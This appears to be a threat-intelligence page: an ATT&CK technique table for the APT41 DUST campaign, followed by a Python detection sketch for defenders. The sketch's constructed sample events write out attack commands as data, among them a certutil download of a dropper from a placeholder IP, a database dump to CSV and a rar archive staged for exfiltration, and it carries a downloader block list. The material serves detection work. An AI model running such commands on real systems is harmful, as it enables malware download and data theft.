| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1583 | Acquire Infrastructure | - |
| enterprise | T1583.007 | Serverless | APT41 DUST used infrastructure hosted behind Cloudflare, or Cloudflare Workers themselves, for command and control. |
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | APT41 DUST used HTTPS for command and control. |
| enterprise | T1560 | Archive Collected Data | - |
| enterprise | T1560.001 | Archive via Utility | APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration. |
| enterprise | T1119 | Automated Collection | APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information. |
| enterprise | T1586 | Compromise Accounts | - |
| enterprise | T1586.003 | Cloud Accounts | APT41 DUST used compromised Google Workspace accounts for command and control. |
| enterprise | T1543 | Create or Modify System Process | - |
| enterprise | T1543.003 | Windows Service | APT41 DUST used Windows services with names such as "Windows Defend" (a look-alike of the legitimate Windows Defender service name) for DUSTPAN persistence. |
| enterprise | T1213 | Data from Information Repositories | - |
| enterprise | T1213.006 | Databases | APT41 DUST collected data from victim Oracle databases using SQLULDR2. |
| enterprise | T1074 | Data Staged | - |
| enterprise | T1074.001 | Local Data Staging | APT41 DUST exported data from Oracle databases to local CSV files prior to exfiltration. |
| enterprise | T1573 | Encrypted Channel | - |
| enterprise | T1573.002 | Asymmetric Cryptography | APT41 DUST used HTTPS for command and control. |
| enterprise | T1567 | Exfiltration Over Web Service | - |
| enterprise | T1567.002 | Exfiltration to Cloud Storage | APT41 DUST exfiltrated collected information to OneDrive. |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.001 | DLL | APT41 DUST used DLL search order hijacking to execute DUSTTRAP, and also DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller. |
| enterprise | T1070 | Indicator Removal | - |
| enterprise | T1070.004 | File Deletion | APT41 DUST deleted various artifacts from victim systems after use. |
| enterprise | T1105 | Ingress Tool Transfer | APT41 DUST executed certutil.exe from a web shell to download the DUSTPAN dropper. |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.004 | Masquerade Task or Service | APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe. |
| enterprise | T1027 | Obfuscated Files or Information | - |
| enterprise | T1027.013 | Encrypted/Encoded File | APT41 DUST used encrypted payloads that were decrypted and executed in memory. |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.003 | Code Signing Certificates | APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and its components. |
| enterprise | T1596 | Search Open Technical Databases | - |
| enterprise | T1596.005 | Scan Databases | APT41 DUST used internet scan data for target development. |
| enterprise | T1593 | Search Open Websites/Domains | - |
| enterprise | T1593.002 | Search Engines | APT41 DUST used search engines to research victim servers. |
| enterprise | T1594 | Search Victim-Owned Websites | APT41 DUST accessed external victim websites for target development. |
| enterprise | T1505 | Server Software Component | - |
| enterprise | T1505.003 | Web Shell | APT41 DUST used web shells such as ANTSWORD and BLUEBEAM for persistence. |
| enterprise | T1553 | Subvert Trust Controls | - |
| enterprise | T1553.002 | Code Signing | APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and subsequent payloads. |
| enterprise | T1569 | System Services | - |
| enterprise | T1569.002 | Service Execution | APT41 DUST used Windows services to execute DUSTPAN. |
| enterprise | T1102 | Web Service | APT41 DUST used compromised Google Workspace accounts for command and control. |
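Several rows above describe a chain a defender can look for on the host: a web shell running under the IIS worker spawning certutil.exe to fetch a dropper (T1505.003 then T1105), a service installed under a look-alike name or a borrowed binary name (T1543.003, T1036.004), SQLULDR2 writing query results to a local CSV (T1213.006, T1074.001), and rar packing that CSV before it leaves (T1560.001). The following is an added detection sketch written for this page, not code from Mandiant, MITRE or any tool named in the table. It runs over constructed process-creation and service-install events embedded below; the field names (parent, image, cmdline, service_name, image_path), the 203.0.113.5 address and the file paths are all assumptions and would need mapping to a real Sysmon or EDR schema.

```python
"""Detection sketch for the DUST behaviours tabulated above (added example).

Editorial example code, not Mandiant's or MITRE's, run over constructed
events rather than real telemetry. Field names (parent, image, cmdline,
service_name, image_path), the IP address and the paths are assumptions.
"""
import re
from pathlib import PureWindowsPath

IIS_WORKER = "w3wp.exe"
IIS_DIR = PureWindowsPath(r"C:\Windows\System32\inetsrv")
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "curl.exe", "powershell.exe"}
MASQUERADE_NAMES = {"w3wp.exe", "conn.exe"}   # names DUSTPAN borrowed, per the table

# Constructed sample events (not real logs): Sysmon 1 / 4688-style process
# creations and System 7045-style service installs.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/d.png C:\Windows\Temp\d.png"},
    {"type": "service", "service_name": "Windows Defend",
     "image_path": r"C:\ProgramData\conn.exe"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\sqluldr2.exe",
     "cmdline": r'sqluldr2.exe user=hr/pw@orcl query="select * from hr.employees" file=C:\Windows\Temp\out.csv'},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\rar.exe",
     "cmdline": r"rar.exe a -hpP@ss C:\Windows\Temp\x.rar C:\Windows\Temp\out.csv"},
    # Two benign-looking records, to show the rules stay quiet on them.
    {"type": "process", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\conhost.exe", "cmdline": "conhost.exe 0x4"},
    {"type": "service", "service_name": "Windows Defender Antivirus Service",
     "image_path": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def rule_webshell_download(ev):
    """T1505.003 -> T1105: the IIS worker spawning a downloader LOLBin given a URL."""
    if ev["type"] != "process" or basename(ev["parent"]) != IIS_WORKER:
        return None
    if basename(ev["image"]) in DOWNLOADERS and re.search(r"https?://", ev["cmdline"], re.I):
        return "T1105"
    return None


def rule_service_masquerade(ev):
    """T1543.003 / T1036.004: a service named like a trusted one but not exactly,
    or a borrowed binary name installed outside the directory the real one lives in."""
    if ev["type"] != "service":
        return None
    name = ev["service_name"].lower()
    lookalike = name.startswith("windows defend") and not name.startswith("windows defender")
    path = PureWindowsPath(ev["image_path"])
    misplaced = path.name.lower() in MASQUERADE_NAMES and path.parent != IIS_DIR
    return "T1543.003" if lookalike or misplaced else None


def rule_db_export(ev):
    """T1213.006 / T1074.001: SQLULDR2 writing query output to a local file."""
    if ev["type"] == "process" and basename(ev["image"]) == "sqluldr2.exe" \
            and re.search(r"\bfile=", ev["cmdline"], re.I):
        return "T1213.006"
    return None


def rule_archive_staged(ev):
    """T1560.001: rar 'a' (add) on the host, typically right before exfiltration."""
    if ev["type"] == "process" and basename(ev["image"]) in {"rar.exe", "winrar.exe"} \
            and re.match(r"\S+\s+a\s", ev["cmdline"]):
        return "T1560.001"
    return None


RULES = [rule_webshell_download, rule_service_masquerade, rule_db_export, rule_archive_staged]


def run_rules(events):
    """Return (event index, technique ID, rule name) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            tid = rule(ev)
            if tid:
                hits.append((i, tid, rule.__name__))
    return hits


def staged_then_archived(events):
    """Correlate T1074.001 with T1560.001: files SQLULDR2 wrote that rar later packed."""
    exported, archived = set(), set()
    for ev in events:
        if ev["type"] != "process":
            continue
        cmd, image = ev["cmdline"], basename(ev["image"])
        if image == "sqluldr2.exe":
            exported |= {m.lower() for m in re.findall(r"file=(\S+)", cmd, re.I)}
        elif image in {"rar.exe", "winrar.exe"}:
            archived |= {tok.lower() for tok in cmd.split() if tok.lower().endswith(".csv")}
    return exported & archived
```

Calling `run_rules(SAMPLE_EVENTS)` flags the first four constructed events and nothing else; `staged_then_archived(SAMPLE_EVENTS)` ties the SQLULDR2 output file to the rar command that packed it, which is the staging-then-archive sequence the T1074.001 and T1560.001 rows describe. The look-alike check in `rule_service_masquerade` is deliberately narrow (a prefix of "Windows Defender" that is not the real name); a production rule would compare against the full list of installed service names rather than one hard-coded stem.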